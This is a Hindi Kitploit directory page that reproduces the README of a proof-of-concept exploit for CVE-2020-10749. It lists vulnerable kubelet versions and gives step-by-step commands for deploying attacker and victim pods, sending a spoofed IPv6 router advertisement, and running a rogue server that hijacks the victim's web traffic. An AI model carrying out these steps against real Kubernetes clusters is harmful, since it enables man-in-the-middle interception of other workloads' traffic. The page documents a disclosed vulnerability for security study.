Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-10749 — CVE-2020-10749 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो पॉड्स के बीच IPv6 रॉग राउटर विज्ञापनों के माध्यम से Kubernetes MitM हमलों को प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/knqyf263/cve-2020-10749
कंटेनर सुरक्षाशोषणवेब एप्लिकेशन शोषणनेटवर्क सुरक्षाक्लाउड सुरक्षा
GitHubknqyf263/cve-2020-10749

CVE-2020-10749

CVE-2020-10749 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो पॉड्स के बीच IPv6 रॉग राउटर विज्ञापनों के माध्यम से Kubernetes MitM हमलों को प्रदर्शित करता है।

रिपॉजिटरी देखें
251426 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-10749

CVE-2020-10749 PoC (Kubernetes MitM attacks via IPv6 rogue router advertisements)

केवल शैक्षिक उद्देश्यों के लिए

डेमो

आवश्यकताएँ

  • निम्नलिखित kubelet संस्करण वाला Kubernetes क्लस्टर
    • kubelet v1.18.0-v1.18.3
    • kubelet v1.17.0-v1.17.6
    • kubelet < v1.16.11

शोषण

एक पीड़ित Pod तैनात करें

root@kitploit:~
$ kubectl apply -f victim/victim.yml
$  kubectl ge pods
NAME                       READY   STATUS    RESTARTS   AGE
victim-5484d9f977-pgtnh    1/1     Running   0          10s
$ kubectl exec -it victim-5484d9f977-pgtnh -- sh
/ # apk add curl
/ # ip -6 a show eth0
3: eth0@if25: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1450 state UP
    inet6 fe80::3c07:afff:feb5:7219/64 scope link
        valid_lft forever preferred_lft forever
/ # ip -6 route
fe80::/64 dev eth0  metric 256
ff00::/8 dev eth0  metric 256
$ curl http://example.com

एक हमलावर Pod तैनात करें

root@kitploit:~
$ kubectl apply -f attacker/attacker.yml
$ kubectl get pods
NAME                       READY   STATUS    RESTARTS   AGE
attacker-8857dd5c9-pnzjw   1/1     Running   0          50s
victim-5484d9f977-pgtnh    1/1     Running   0          10s

एक धोखाधड़ी राउटर विज्ञापन संदेश भेजें

root@kitploit:~
$ kubectl exec -it attacker-8857dd5c9-pnzjw -- sh
/ # ip a show eth0 | grep "link/ether" | awk '{print $2}'
aa:ca:d1:91:8f:23
/ # sed -i 's/\[YOUR_MAC_ADDR\]/aa:ca:d1:91:8f:23/g' fake_ra.py
/ # python fake_ra.py
Sending a fake router advertisement message...
.
Sent 1 packets.

एक धोखाधड़ी सर्वर लॉन्च करें

root@kitploit:~
$ kubectl exec -it attacker-8857dd5c9-pnzjw -- sh
/ # python server.py
Listening...

एक वैध वेबसाइट तक पहुंचें

सुनिश्चित करें कि एक नया IPv6 पता और डिफ़ॉल्ट गेटवे जोड़े गए हैं।

root@kitploit:~
$ kubectl exec -it victim-5484d9f977-pgtnh -- sh
/ # ip -6 a show eth0
3: eth0@if27: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1450 state UP
    inet6 2001:db8:1:0:1854:9aff:fe75:2368/64 scope global dynamic
           valid_lft forever preferred_lft forever
               inet6 fe80::1854:9aff:fe75:2368/64 scope link
                      valid_lft forever preferred_lft forever
/ # ip -6 route
2001:db8:1::/64 dev eth0  metric 256
fe80::/64 dev eth0  metric 256
default via fe80::42:fcff:dead:beef dev eth0  metric 1024  expires 0sec
ff00::/8 dev eth0  metric 256
/ # curl http://example.com
malicious!!!!!!!

संदर्भ

  • https://github.com/kubernetes/kubernetes/issues/91507

लेखक

Teppei Fukuda

टूल डाउनलोड करें